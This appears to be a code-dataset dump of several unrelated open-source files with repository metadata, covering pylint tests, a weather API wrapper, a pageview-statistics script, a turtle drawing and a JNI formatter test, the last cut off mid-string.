a1ad0753d5922b93bbb27c427f8ee68ebc4a23a3
|
[
"MIT"
] | 4
|
2020-05-01T15:17:21.000Z
|
2021-07-10T05:49:39.000Z
|
realtime_api/game/__init__.py
|
mmartin/ogs_api
|
a1ad0753d5922b93bbb27c427f8ee68ebc4a23a3
|
[
"MIT"
] | null | null | null |
realtime_api/game/__init__.py
|
mmartin/ogs_api
|
a1ad0753d5922b93bbb27c427f8ee68ebc4a23a3
|
[
"MIT"
] | 1
|
2021-02-07T20:33:28.000Z
|
2021-02-07T20:33:28.000Z
|
from .game import game_connect, game_disconnect
from .game import add_game_clock_handler, add_game_move_handler, add_game_undo_requested_handler, add_game_handler
from .game import game_chat, game_pass, game_resume
| 53.75
| 114
| 0.874419
| 35
| 215
| 4.885714
| 0.4
| 0.163743
| 0.245614
| 0.210526
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.083721
| 215
| 3
| 115
| 71.666667
| 0.86802
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0.333333
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
| 1
| 0
|
0
| 7
|
d3cb5876969848da3acddb0e3a3267d3fc5fdffb
| 2,005
|
py
|
Python
|
rotkehlchen/tests/pylint/test_disallow_not.py
|
coblee/rotki
|
d675f5c2d0df5176337b7b10038524ee74923482
|
[
"BSD-3-Clause"
] | 137
|
2018-03-05T11:53:29.000Z
|
2019-11-03T16:38:42.000Z
|
rotkehlchen/tests/pylint/test_disallow_not.py
|
coblee/rotki
|
d675f5c2d0df5176337b7b10038524ee74923482
|
[
"BSD-3-Clause"
] | 385
|
2018-03-08T12:43:41.000Z
|
2019-11-10T09:15:36.000Z
|
rotkehlchen/tests/pylint/test_disallow_not.py
|
coblee/rotki
|
d675f5c2d0df5176337b7b10038524ee74923482
|
[
"BSD-3-Clause"
] | 59
|
2018-03-08T10:08:27.000Z
|
2019-10-26T11:30:44.000Z
|
import astroid
from tools.pylint import NotBooleanChecker
def test_detect_list_as_nonboolean_not(pylint_test_linter):
checker = NotBooleanChecker(linter=pylint_test_linter)
node = astroid.extract_node("""
a = []
not a #@
""")
checker.visit_unaryop(node)
messages = checker.linter.release_messages()
assert len(messages) == 1
def test_detect_dict_as_nonboolean_not(pylint_test_linter):
checker = NotBooleanChecker(linter=pylint_test_linter)
node = astroid.extract_node("""
a = {}
not a #@
""")
checker.visit_unaryop(node)
messages = checker.linter.release_messages()
assert len(messages) == 1
def test_boolean_does_not_trigger_checker(pylint_test_linter):
checker = NotBooleanChecker(linter=pylint_test_linter)
node = astroid.extract_node("""
a = False
not a #@
""")
checker.visit_unaryop(node)
messages = checker.linter.release_messages()
assert len(messages) == 0
def test_isinstance_does_not_trigger_checker(pylint_test_linter):
checker = NotBooleanChecker(linter=pylint_test_linter)
node = astroid.extract_node("""
a = 5
not isinstance(a, str) #@
""")
checker.visit_unaryop(node)
messages = checker.linter.release_messages()
assert len(messages) == 0
def test_boolean_function_does_not_trigger_checker(pylint_test_linter):
checker = NotBooleanChecker(linter=pylint_test_linter)
node = astroid.extract_node("""
def foo() -> bool:
return True
not foo() #@
""")
checker.visit_unaryop(node)
messages = checker.linter.release_messages()
assert len(messages) == 0
def test_subsscript_function_does_not_crash_checker(pylint_test_linter):
checker = NotBooleanChecker(linter=pylint_test_linter)
node = astroid.extract_node("""
def foo() -> Optional[object]:
return object()
not foo() #@
""")
checker.visit_unaryop(node)
messages = checker.linter.release_messages()
assert len(messages) == 0
| 28.239437
| 72
| 0.707232
| 238
| 2,005
| 5.647059
| 0.180672
| 0.089286
| 0.142857
| 0.102679
| 0.848958
| 0.848958
| 0.848958
| 0.848958
| 0.848958
| 0.848958
| 0
| 0.004284
| 0.185037
| 2,005
| 70
| 73
| 28.642857
| 0.818237
| 0
| 0
| 0.706897
| 0
| 0
| 0.14015
| 0
| 0
| 0
| 0
| 0
| 0.103448
| 1
| 0.103448
| false
| 0
| 0.034483
| 0
| 0.172414
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
d3d0bb0cd5f3b726b99ea184a847d04b28bd0297
| 47
|
py
|
Python
|
src/backend/app/api/public/claims/claim/__init__.py
|
aimanow/sft
|
dce87ffe395ae4bd08b47f28e07594e1889da819
|
[
"Apache-2.0"
] | null | null | null |
src/backend/app/api/public/claims/claim/__init__.py
|
aimanow/sft
|
dce87ffe395ae4bd08b47f28e07594e1889da819
|
[
"Apache-2.0"
] | null | null | null |
src/backend/app/api/public/claims/claim/__init__.py
|
aimanow/sft
|
dce87ffe395ae4bd08b47f28e07594e1889da819
|
[
"Apache-2.0"
] | null | null | null |
from . import claim
from . import claim_status
| 15.666667
| 26
| 0.787234
| 7
| 47
| 5.142857
| 0.571429
| 0.555556
| 0.833333
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.170213
| 47
| 2
| 27
| 23.5
| 0.923077
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
d3d7bf660ef94028eeaece27b502271d848dab3f
| 844
|
py
|
Python
|
tests/test_provider_unicell_scaffolding.py
|
mjuenema/python-terrascript
|
6d8bb0273a14bfeb8ff8e950fe36f97f7c6e7b1d
|
[
"BSD-2-Clause"
] | 507
|
2017-07-26T02:58:38.000Z
|
2022-01-21T12:35:13.000Z
|
tests/test_provider_unicell_scaffolding.py
|
mjuenema/python-terrascript
|
6d8bb0273a14bfeb8ff8e950fe36f97f7c6e7b1d
|
[
"BSD-2-Clause"
] | 135
|
2017-07-20T12:01:59.000Z
|
2021-10-04T22:25:40.000Z
|
tests/test_provider_unicell_scaffolding.py
|
mjuenema/python-terrascript
|
6d8bb0273a14bfeb8ff8e950fe36f97f7c6e7b1d
|
[
"BSD-2-Clause"
] | 81
|
2018-02-20T17:55:28.000Z
|
2022-01-31T07:08:40.000Z
|
# tests/test_provider_unicell_scaffolding.py
# Automatically generated by tools/makecode.py (24-Sep-2021 15:26:17 UTC)
def test_provider_import():
import terrascript.provider.unicell.scaffolding
def test_resource_import():
from terrascript.resource.unicell.scaffolding import scaffolding_resource
def test_datasource_import():
from terrascript.data.unicell.scaffolding import scaffolding_data_source
# TODO: Shortcut imports without namespace for official and supported providers.
# TODO: This has to be moved into a required_providers block.
# def test_version_source():
#
# import terrascript.provider.unicell.scaffolding
#
# t = terrascript.provider.unicell.scaffolding.scaffolding()
# s = str(t)
#
# assert 'https://github.com/unicell/terraform-provider-scaffolding' in s
# assert '0.0.2' in s
| 29.103448
| 80
| 0.767773
| 108
| 844
| 5.861111
| 0.527778
| 0.170616
| 0.164297
| 0.175355
| 0.135861
| 0
| 0
| 0
| 0
| 0
| 0
| 0.020747
| 0.143365
| 844
| 28
| 81
| 30.142857
| 0.854772
| 0.61019
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0.035714
| 0
| 1
| 0.5
| true
| 0
| 1
| 0
| 1.5
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 0
| 1
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
31082e8b64adbf6273c8705935c2c988ca3cf3ff
| 4,598
|
py
|
Python
|
EnglishWiki/COVID-19 pandemic in Germany/tables.py
|
Astruj/Regional-English-Wiki
|
2930765f06b6dbd1ade2004522f38f4d2fd08156
|
[
"MIT"
] | null | null | null |
EnglishWiki/COVID-19 pandemic in Germany/tables.py
|
Astruj/Regional-English-Wiki
|
2930765f06b6dbd1ade2004522f38f4d2fd08156
|
[
"MIT"
] | null | null | null |
EnglishWiki/COVID-19 pandemic in Germany/tables.py
|
Astruj/Regional-English-Wiki
|
2930765f06b6dbd1ade2004522f38f4d2fd08156
|
[
"MIT"
] | null | null | null |
#import csv
from matplotlib import pyplot as plt
import pandas as pd
import csv
df = pd.read_csv ('de_data.csv')
de_articles = list(df['article'])
pageviews1 = list(df['Pageviews'])
numArticles1 = len(de_articles)
temp = 0
for i in range(0,numArticles1):
temp = temp + pageviews1[i]
avg1 = temp/numArticles1
df = pd.read_csv ('en_data.csv')
en_articles = list(df['article'])
pageviews2 = list(df['pageviews'])
numArticles2 = len(en_articles)
temp = 0
for i in range(0,numArticles2):
temp = temp + pageviews2[i]
avg2 = temp/numArticles2
parameters = ['Article','Average pageviews in a category']
filename = "averagePageviewsTable1.csv"
with open(filename, "w+") as f:
writer = csv.writer(f)
writer.writerow(parameters)
row = ['German', avg1]
writer.writerow(row)
row = []
writer.writerow(row)
writer.writerow(row)
row = ['English', avg2]
writer.writerow(row)
################
###################
#pgviewsPerEditor
###################
##################
df = pd.read_csv ('de_data.csv')
de_articles = list(df['article'])
pageviews = list(df['Pageviews'])
numEditors = list(df['Number Of Unique Editors'])
ratio1 = []
for i in range(0,len(pageviews)):
ratio1.append(pageviews[i]/numEditors[i])
print(ratio1)
de_len = len(ratio1)
print(de_len)
df = pd.read_csv('en_data.csv')
en_articles = list(df['article'])
pageviews = list(df['pageviews'])
numEditors = list(df['numEditors'])
ratio2 = []
for i in range(0,len(pageviews)):
ratio2.append(pageviews[i]/numEditors[i])
en_len = len(ratio2)
print(ratio2)
print(en_len)
parameters = ['Article','Ratio pageviews/editors']
filename = "de_pgviewsPerEditorTable1.csv"
with open(filename, "w+") as f:
writer = csv.writer(f)
writer.writerow(parameters)
x = 0
for i in range(0,de_len):
row = [de_articles[i],ratio1[i]]
x = x +ratio1[i]
writer.writerow(row)
row = ['Average', x/de_len]
writer.writerow(row)
parameters = ['Article','Ratio pageviews/editors']
filename = "en_pgviewsPerEditorTable1.csv"
with open(filename, "w+") as f:
writer = csv.writer(f)
writer.writerow(parameters)
x = 0
for i in range(0,en_len):
row = [en_articles[i],ratio2[i]]
x = x +ratio2[i]
writer.writerow(row)
row = ['Average', x/en_len]
writer.writerow(row)
###############
#############
df = pd.read_csv ('de_data.csv')
de_articles = list(df['article'])
revisions1 = list(df['Revisions'])
numArticles1 = len(de_articles)
temp = 0
for i in range(0,numArticles1):
temp = temp + revisions1[i]
avg1 = temp/numArticles1
df = pd.read_csv ('en_data.csv')
en_articles = list(df['article'])
revisions2 = list(df['revisions'])
numArticles2 = len(en_articles)
temp = 0
for i in range(0,numArticles2):
temp = temp + revisions2[i]
avg2 = temp/numArticles2
parameters = ['Article','Average revisions in a category']
filename = "averageRevisionsTable1.csv"
with open(filename, "w+") as f:
writer = csv.writer(f)
writer.writerow(parameters)
row = ['German', avg1]
writer.writerow(row)
row = []
writer.writerow(row)
writer.writerow(row)
row = ['English', avg2]
writer.writerow(row)
####
#revisionsPerEDITOR
#########
df = pd.read_csv ('de_data.csv')
de_articles = list(df['article'])
revisions = list(df['Revisions'])
numEditors = list(df['Number Of Unique Editors'])
ratio1 = []
for i in range(0,len(revisions)):
ratio1.append(revisions[i]/numEditors[i])
print(ratio1)
de_len = len(ratio1)
print(de_len)
df = pd.read_csv('en_data.csv')
en_articles = list(df['article'])
revisions = list(df['revisions'])
numEditors = list(df['numEditors'])
ratio2 = []
for i in range(0,len(revisions)):
ratio2.append(revisions[i]/numEditors[i])
en_len = len(ratio2)
print(ratio2)
print(en_len)
parameters = ['Article','Ratio revisions/editors']
filename = "de_revisionsPerEditorTable1.csv"
with open(filename, "w+") as f:
writer = csv.writer(f)
writer.writerow(parameters)
x = 0
for i in range(0,de_len):
row = [de_articles[i],ratio1[i]]
x = x +ratio1[i]
writer.writerow(row)
row = ['Average', x/de_len]
writer.writerow(row)
parameters = ['Article','Ratio revisions/editors']
filename = "en_revisionsPerEditorTable1.csv"
with open(filename, "w+") as f:
writer = csv.writer(f)
writer.writerow(parameters)
x = 0
for i in range(0,en_len):
row = [en_articles[i],ratio2[i]]
x = x +ratio2[i]
writer.writerow(row)
row = ['Average', x/en_len]
writer.writerow(row)
##########
| 23.340102
| 59
| 0.64876
| 626
| 4,598
| 4.682109
| 0.103834
| 0.105084
| 0.092801
| 0.045036
| 0.873422
| 0.852951
| 0.820198
| 0.777209
| 0.777209
| 0.777209
| 0
| 0.020575
| 0.175511
| 4,598
| 197
| 60
| 23.340102
| 0.752572
| 0.009569
| 0
| 0.816327
| 0
| 0
| 0.162339
| 0.038835
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.020408
| 0
| 0.020408
| 0.054422
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
31312f22f1f3e36d5722f1a34f233e808f8b603f
| 167
|
py
|
Python
|
qiskit_utils/__init__.py
|
mgrzesiuk/qiskit-utils
|
ba29d31221815e4690aec4f7abbcc2e6d0747c80
|
[
"MIT"
] | null | null | null |
qiskit_utils/__init__.py
|
mgrzesiuk/qiskit-utils
|
ba29d31221815e4690aec4f7abbcc2e6d0747c80
|
[
"MIT"
] | null | null | null |
qiskit_utils/__init__.py
|
mgrzesiuk/qiskit-utils
|
ba29d31221815e4690aec4f7abbcc2e6d0747c80
|
[
"MIT"
] | null | null | null |
from qiskit_utils.insert import insert_instruction
from qiskit_utils.enhanced_circuit import QuantumCircuitEnhanced
from qiskit_utils.parse_result import parse_result
| 41.75
| 64
| 0.91018
| 22
| 167
| 6.590909
| 0.5
| 0.206897
| 0.310345
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.071856
| 167
| 3
| 65
| 55.666667
| 0.935484
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
31559566b03dbab432dfa66edb7d6c737c1fe772
| 7,630
|
py
|
Python
|
src/weather/weather.py
|
SzymonWilczewski/weather-project-tdd
|
edd92e3ae198496331e7140f9c8a008d56f9528c
|
[
"MIT"
] | null | null | null |
src/weather/weather.py
|
SzymonWilczewski/weather-project-tdd
|
edd92e3ae198496331e7140f9c8a008d56f9528c
|
[
"MIT"
] | null | null | null |
src/weather/weather.py
|
SzymonWilczewski/weather-project-tdd
|
edd92e3ae198496331e7140f9c8a008d56f9528c
|
[
"MIT"
] | null | null | null |
from src.weather.weather_data import WeatherData
class Weather:
def __init__(self):
self.data = WeatherData()
def current_temperature_by_city_name(self, city_name):
try:
weather = self.data.get_current_weather_by_city_name(city_name)
return round(weather["main"]["temp"] - 273.15, 2)
except TypeError:
raise TypeError("Wrong type!")
except ValueError:
raise ValueError("Wrong value!")
def current_temperature_by_city_id(self, city_id):
try:
weather = self.data.get_current_weather_by_city_id(city_id)
return round(weather["main"]["temp"] - 273.15, 2)
except TypeError:
raise TypeError("Wrong type!")
except ValueError:
raise ValueError("Wrong value!")
def current_pressure_by_city_name(self, city_name):
try:
weather = self.data.get_current_weather_by_city_name(city_name)
return weather["main"]["pressure"]
except TypeError:
raise TypeError("Wrong type!")
except ValueError:
raise ValueError("Wrong value!")
def current_pressure_by_city_id(self, city_id):
try:
weather = self.data.get_current_weather_by_city_id(city_id)
return weather["main"]["pressure"]
except TypeError:
raise TypeError("Wrong type!")
except ValueError:
raise ValueError("Wrong value!")
def current_humidity_by_city_name(self, city_name):
try:
weather = self.data.get_current_weather_by_city_name(city_name)
return weather["main"]["humidity"]
except TypeError:
raise TypeError("Wrong type!")
except ValueError:
raise ValueError("Wrong value!")
def current_humidity_by_city_id(self, city_id):
try:
weather = self.data.get_current_weather_by_city_id(city_id)
return weather["main"]["humidity"]
except TypeError:
raise TypeError("Wrong type!")
except ValueError:
raise ValueError("Wrong value!")
def week_temperature_forecast_by_city_name(self, city_name):
try:
weather = self.data.get_week_weather_by_city_name(city_name)
temperature = []
for day in weather["list"]:
temperature.append(round(day["temp"]["day"] - 273.15, 2))
return temperature
except TypeError:
raise TypeError("Wrong type!")
except ValueError:
raise ValueError("Wrong value!")
def week_temperature_forecast_by_city_id(self, city_id):
try:
weather = self.data.get_week_weather_by_city_id(city_id)
temperature = []
for day in weather["list"]:
temperature.append(round(day["temp"]["day"] - 273.15, 2))
return temperature
except TypeError:
raise TypeError("Wrong type!")
except ValueError:
raise ValueError("Wrong value!")
def week_pressure_forecast_by_city_name(self, city_name):
try:
weather = self.data.get_week_weather_by_city_name(city_name)
pressure = []
for day in weather["list"]:
pressure.append(day["pressure"])
return pressure
except TypeError:
raise TypeError("Wrong type!")
except ValueError:
raise ValueError("Wrong value!")
def week_pressure_forecast_by_city_id(self, city_id):
try:
weather = self.data.get_week_weather_by_city_id(city_id)
pressure = []
for day in weather["list"]:
pressure.append(day["pressure"])
return pressure
except TypeError:
raise TypeError("Wrong type!")
except ValueError:
raise ValueError("Wrong value!")
def week_humidity_forecast_by_city_name(self, city_name):
try:
weather = self.data.get_week_weather_by_city_name(city_name)
humidity = []
for day in weather["list"]:
humidity.append(day["humidity"])
return humidity
except TypeError:
raise TypeError("Wrong type!")
except ValueError:
raise ValueError("Wrong value!")
def week_humidity_forecast_by_city_id(self, city_id):
try:
weather = self.data.get_week_weather_by_city_id(city_id)
humidity = []
for day in weather["list"]:
humidity.append(day["humidity"])
return humidity
except TypeError:
raise TypeError("Wrong type!")
except ValueError:
raise ValueError("Wrong value!")
def week_average_temperature_by_city_name(self, city_name):
try:
weather = self.data.get_week_weather_by_city_name(city_name)
temperature = []
for day in weather["list"]:
temperature.append(round(day["temp"]["day"] - 273.15, 2))
return round(sum(temperature) / len(temperature), 2)
except TypeError:
raise TypeError("Wrong type!")
except ValueError:
raise ValueError("Wrong value!")
def week_average_temperature_by_city_id(self, city_id):
try:
weather = self.data.get_week_weather_by_city_id(city_id)
temperature = []
for day in weather["list"]:
temperature.append(round(day["temp"]["day"] - 273.15, 2))
return round(sum(temperature) / len(temperature), 2)
except TypeError:
raise TypeError("Wrong type!")
except ValueError:
raise ValueError("Wrong value!")
def week_average_pressure_by_city_name(self, city_name):
try:
weather = self.data.get_week_weather_by_city_name(city_name)
pressure = []
for day in weather["list"]:
pressure.append(day["pressure"])
return int(round(sum(pressure) / len(pressure), 0))
except TypeError:
raise TypeError("Wrong type!")
except ValueError:
raise ValueError("Wrong value!")
def week_average_pressure_by_city_id(self, city_id):
try:
weather = self.data.get_week_weather_by_city_id(city_id)
pressure = []
for day in weather["list"]:
pressure.append(day["pressure"])
return int(round(sum(pressure) / len(pressure), 0))
except TypeError:
raise TypeError("Wrong type!")
except ValueError:
raise ValueError("Wrong value!")
def week_average_humidity_by_city_name(self, city_name):
try:
weather = self.data.get_week_weather_by_city_name(city_name)
humidity = []
for day in weather["list"]:
humidity.append(day["humidity"])
return int(round(sum(humidity) / len(humidity), 0))
except TypeError:
raise TypeError("Wrong type!")
except ValueError:
raise ValueError("Wrong value!")
def week_average_humidity_by_city_id(self, city_id):
try:
weather = self.data.get_week_weather_by_city_id(city_id)
humidity = []
for day in weather["list"]:
humidity.append(day["humidity"])
return int(round(sum(humidity) / len(humidity), 0))
except TypeError:
raise TypeError("Wrong type!")
except ValueError:
raise ValueError("Wrong value!")
| 37.219512
| 75
| 0.593578
| 851
| 7,630
| 5.06933
| 0.054054
| 0.05007
| 0.041725
| 0.075104
| 0.980529
| 0.97821
| 0.97821
| 0.97821
| 0.97821
| 0.97821
| 0
| 0.007977
| 0.309961
| 7,630
| 204
| 76
| 37.401961
| 0.811396
| 0
| 0
| 0.880435
| 0
| 0
| 0.080996
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.103261
| false
| 0
| 0.005435
| 0
| 0.211957
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
317f000dda18a9ea0d519810c8cce68479fd9aee
| 549
|
py
|
Python
|
Scratch_22.py
|
UNKNOWN-CODERS/Olympic-Design-Python-
|
724eb0f19a5129144795c655cc9d84764b069b54
|
[
"Apache-2.0"
] | null | null | null |
Scratch_22.py
|
UNKNOWN-CODERS/Olympic-Design-Python-
|
724eb0f19a5129144795c655cc9d84764b069b54
|
[
"Apache-2.0"
] | null | null | null |
Scratch_22.py
|
UNKNOWN-CODERS/Olympic-Design-Python-
|
724eb0f19a5129144795c655cc9d84764b069b54
|
[
"Apache-2.0"
] | null | null | null |
import turtle
turtle.pensize(8)
turtle.color('blue')
turtle.penup()
turtle.goto(-110,-25)
turtle.pendown()
turtle.circle(50)
turtle.color('black')
turtle.penup()
turtle.goto(0,-25)
turtle.pendown()
turtle.circle(50)
turtle.color('red')
turtle.penup()
turtle.goto(110,-25)
turtle.pendown()
turtle.circle(50)
turtle.color('yellow')
turtle.penup()
turtle.goto(-55,-75)
turtle.pendown()
turtle.circle(50)
turtle.color('green')
turtle.penup()
turtle.goto(55,-75)
turtle.pendown()
turtle.circle(50)
turtle.done()
| 15.25
| 23
| 0.68306
| 77
| 549
| 4.87013
| 0.272727
| 0.146667
| 0.226667
| 0.28
| 0.770667
| 0.770667
| 0.770667
| 0.757333
| 0.650667
| 0.650667
| 0
| 0.066946
| 0.129326
| 549
| 35
| 24
| 15.685714
| 0.717573
| 0
| 0
| 0.535714
| 0
| 0
| 0.044834
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.035714
| 0
| 0.035714
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
31bdda1d4e09ce3bcae6569c576a23ea3cd89f9e
| 13,251
|
py
|
Python
|
wpiformat/wpiformat/test/test_jni.py
|
prateekma/styleguide
|
962c6cd6e316b71156d80e5751e8a76a01b60668
|
[
"BSD-3-Clause"
] | null | null | null |
wpiformat/wpiformat/test/test_jni.py
|
prateekma/styleguide
|
962c6cd6e316b71156d80e5751e8a76a01b60668
|
[
"BSD-3-Clause"
] | null | null | null |
wpiformat/wpiformat/test/test_jni.py
|
prateekma/styleguide
|
962c6cd6e316b71156d80e5751e8a76a01b60668
|
[
"BSD-3-Clause"
] | null | null | null |
import os
from .tasktest import *
from wpiformat.jni import Jni
def test_jni():
test = TaskTest(Jni())
# Input args go to next line even if they fit on same line
test.add_input("./TestJNI.cpp",
"JNIEXPORT void JNICALL" + os.linesep + \
"Java_TestJNI_testFunc(JNIEnv* env, jclass) {" + os.linesep)
test.add_output(
"/*" + os.linesep + \
" * Class: TestJNI" + os.linesep + \
" * Method: testFunc" + os.linesep + \
" * Signature: ()V" + os.linesep + \
" */" + os.linesep + \
"JNIEXPORT void JNICALL" + os.linesep + \
"Java_TestJNI_testFunc" + os.linesep + \
" (JNIEnv* env, jclass)" + os.linesep + \
"{" + os.linesep, True, True)
# Input aligned to "(" and args past end of line
test.add_input("./TestJNI.cpp",
"JNIEXPORT void JNICALL" + os.linesep + \
"Java_edu_wpi_cscore_CameraServerJNI_setCameraExposureHoldCurrent(JNIEnv* env," + os.linesep + \
" jclass," + os.linesep + \
" jint source) {" + os.linesep)
test.add_output(
"/*" + os.linesep + \
" * Class: edu_wpi_cscore_CameraServerJNI" + os.linesep + \
" * Method: setCameraExposureHoldCurrent" + os.linesep + \
" * Signature: (I)V" + os.linesep + \
" */" + os.linesep + \
"JNIEXPORT void JNICALL" + os.linesep + \
"Java_edu_wpi_cscore_CameraServerJNI_setCameraExposureHoldCurrent" + os.linesep + \
" (JNIEnv* env, jclass, jint source)" + os.linesep + \
"{" + os.linesep, True, True)
# Args in input on line after "(" and args length > 80 characters
test.add_input("./TestJNI.cpp",
"JNIEXPORT void JNICALL Java_edu_wpi_cscore_CameraServerJNI_putSourceFrame(" + os.linesep + \
" JNIEnv *env, jclass, jint source, jlong imageNativeObj) {" + os.linesep)
test.add_output(
"/*" + os.linesep + \
" * Class: edu_wpi_cscore_CameraServerJNI" + os.linesep + \
" * Method: putSourceFrame" + os.linesep + \
" * Signature: (IJ)V" + os.linesep + \
" */" + os.linesep + \
"JNIEXPORT void JNICALL" + os.linesep + \
"Java_edu_wpi_cscore_CameraServerJNI_putSourceFrame" + os.linesep + \
" (JNIEnv *env, jclass, jint source, jlong imageNativeObj)" + os.linesep + \
"{" + os.linesep, True, True)
# Args > 80 characters long
test.add_input("./TestJNI.cpp",
"JNIEXPORT jint JNICALL Java_edu_wpi_cscore_CameraServerJNI_createSourceProperty(" + os.linesep + \
" JNIEnv *env, jclass, jint source, jstring name, jint kind, jint minimum," + os.linesep + \
" jint maximum, jint step, jint defaultValue, jint value) {" + os.linesep)
test.add_output(
"/*" + os.linesep + \
" * Class: edu_wpi_cscore_CameraServerJNI" + os.linesep + \
" * Method: createSourceProperty" + os.linesep + \
" * Signature: (ILjava/lang/String;IIIIII)I" + os.linesep + \
" */" + os.linesep + \
"JNIEXPORT jint JNICALL" + os.linesep + \
"Java_edu_wpi_cscore_CameraServerJNI_createSourceProperty" + os.linesep + \
" (JNIEnv *env, jclass, jint source, jstring name, jint kind, jint minimum," + os.linesep + \
" jint maximum, jint step, jint defaultValue, jint value)" + os.linesep + \
"{" + os.linesep, True, True)
# Ensure fixes clang-format output aligned with "("
test.add_input("./TestJNI.cpp",
"JNIEXPORT jint JNICALL" + os.linesep + \
"Java_edu_wpi_first_networktables_NetworkTablesJNI_createInstance(JNIEnv*," + os.linesep + \
" jclass) {" + os.linesep)
test.add_output(
"/*" + os.linesep + \
" * Class: edu_wpi_first_networktables_NetworkTablesJNI" + os.linesep + \
" * Method: createInstance" + os.linesep + \
" * Signature: ()I" + os.linesep + \
" */" + os.linesep + \
"JNIEXPORT jint JNICALL" + os.linesep + \
"Java_edu_wpi_first_networktables_NetworkTablesJNI_createInstance" + os.linesep + \
" (JNIEnv*, jclass)" + os.linesep + \
"{" + os.linesep, True, True)
# Idempotence for same code
test.add_input("./TestJNI.cpp",
"/*" + os.linesep + \
" * Class: edu_wpi_first_networktables_NetworkTablesJNI" + os.linesep + \
" * Method: createInstance" + os.linesep + \
" * Signature: ()I" + os.linesep + \
" */" + os.linesep + \
"JNIEXPORT jint JNICALL" + os.linesep + \
"Java_edu_wpi_first_networktables_NetworkTablesJNI_createInstance" + os.linesep + \
" (JNIEnv*, jclass)" + os.linesep + \
"{" + os.linesep)
test.add_latest_input_as_output(True)
# Idempotence for same code with named jclass variable
test.add_input("./TestJNI.cpp",
"/*" + os.linesep + \
" * Class: edu_wpi_first_networktables_NetworkTablesJNI" + os.linesep + \
" * Method: createInstance" + os.linesep + \
" * Signature: ()I" + os.linesep + \
" */" + os.linesep + \
"JNIEXPORT jint JNICALL" + os.linesep + \
"Java_edu_wpi_first_networktables_NetworkTablesJNI_createInstance" + os.linesep + \
" (JNIEnv*, jclass class)" + os.linesep + \
"{" + os.linesep)
test.add_latest_input_as_output(True)
# Check signature that breaks verbose regexes
test.add_input("./NetworkTablesJNI.cpp",
"/*" + os.linesep + \
" * Class: edu_wpi_first_networktables_NetworkTablesJNI" + os.linesep + \
" * Method: getEntry" + os.linesep + \
" * Signature: (ILjava/lang/String;)I" + os.linesep + \
" */" + os.linesep + \
"JNIEXPORT jint JNICALL" + os.linesep + \
"Java_edu_wpi_first_networktables_NetworkTablesJNI_getEntry(JNIEnv* env, jclass," + os.linesep + \
" jint inst," + os.linesep + \
" jstring key) {" + os.linesep)
test.add_output("/*" + os.linesep + \
" * Class: edu_wpi_first_networktables_NetworkTablesJNI" + os.linesep + \
" * Method: getEntry" + os.linesep + \
" * Signature: (ILjava/lang/String;)I" + os.linesep + \
" */" + os.linesep + \
"JNIEXPORT jint JNICALL" + os.linesep + \
"Java_edu_wpi_first_networktables_NetworkTablesJNI_getEntry" + os.linesep + \
" (JNIEnv* env, jclass, jint inst, jstring key)" + os.linesep + \
"{" + os.linesep, True, True)
# Function with array type as argument
test.add_input("./NetworkTablesJNI.cpp",
"/*" + os.linesep + \
